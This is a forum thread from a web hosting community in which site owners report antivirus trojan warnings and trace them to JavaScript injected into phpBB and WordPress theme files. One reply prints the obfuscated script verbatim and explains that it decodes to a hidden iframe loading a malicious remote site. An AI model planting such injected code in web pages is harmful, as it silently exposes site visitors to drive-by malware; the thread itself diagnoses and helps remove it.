Jump to content
xisto Community
Sign in to follow this  
Moody

Scanning My Site on virusses

Recommended Posts

When I go to your site, all I can see is the Index Directory page, and nothing else, NO virus warnings or anything like that. Perhaps your Norton doesn't like Xisto. :mellow: GreetingZ

Share this post


Link to post
Share on other sites

Now I hate to admit it, but a friend when visiting my blog (hosted here) had the same issue. But then with trojans....

She also uses Norton...

My blog http://forums.xisto.com/no_longer_exists/

Some more - Klass went to my site, which gives him an ActiveX error (though I at NO point used ActiveX in my site - only HTML - JavaScript and php) and that originated from an IP address other then my own sites IP (here's the WHOIS on the IP) What also worries me is - the 69.50.177.102/x379 seems to be a redirect to xawm.biz :cry:)

The issue in my case seems to be a theme I updated last night, it held a small section of JavaScript code that forced my visitors in IE to download a trojan from a RUssian site. So I urge you to manually check code - in WordPress also the Themes for JavaScript code.

Share this post


Link to post
Share on other sites

Guys (moody, moonwitch), you both seem to share the same problem.

Moody is using a phpBB forum, and moon has problems with her log, that runs on Wordpress..

However, you both (well.. only moody now, moon deleted her problem a while ago). Have a piece of javascript at the bottom of your site.

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body>

When you decode it, you can see that it's actually a hidden frame which links to a attempts to open a site http://forums.xisto.com/no_longer_exists/

Which, in return attempts to open these sites:

http://forums.xisto.com/no_longer_exists/

http://forums.xisto.com/no_longer_exists/

The first one is some kinda of counter, which can be ignored

The second one attempts to load a certain applet, which I can't be bothered to checkout what it exactly does, probably something malicious :S

To make a long story short. This is what could've happened.

1. Both of you suffered from an automated exploit batch which put the code there.
2. You guys got your site hacked, because someone was bored
3. I think this is it, Xisto has gotten hacked :|.

I come to this conclusion because both Moody and Moonwitch use a quite common piece of software (phpbb, wordpress), and they have the same problem at around the same time. And that there is some kind of script around here somewhere that changes stuff (cronjob maybe?).

Anyway, everyone, if you use any kind of common software, forums/msg's boards/blogs etc. etc..

Please check your site for above code and remove it. And report it ofcourse.

Share this post


Link to post
Share on other sites

I once installed a test forum here on Xisto, but FORTUNATELY I can't find any of the malicious source code in my pages. I hope that nobody here on Xisto is being hacked. :mellow:

Share this post


Link to post
Share on other sites

Oke guys, i can say, my problem is also a trojan. Norton says that, but where is that code, i mean in wich file, or do i have to check all my files? Pls help, cus i think my visitors don't like this.

Share this post


Link to post
Share on other sites

Oke guys, good news, i overwrited the templates subsilver folder and i dno't get the error from norton anymore, so i guess the trojan is away, but ofcourse i want to change my password now and it won't work i get this:There was an error manipulating the password file.Can you help me?

Share this post


Link to post
Share on other sites

In my case - I had to check the source code of my blog. Apparently the code got added to every footer.php file in all my skins for WordPress. And I deleted the code last night - to return and find the code came back :mellow:

Password changes, moody, is per request.
http://forums.xisto.com/topic/101-forum/

Share this post


Link to post
Share on other sites

I think Cpanel comes with an Antivirus! You can scan your system with that. I haven't been hosted yet but my earlier host had an antivirus after a virus outbreak affecting all my php files ! Some 'iframe problem stuff!!!

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.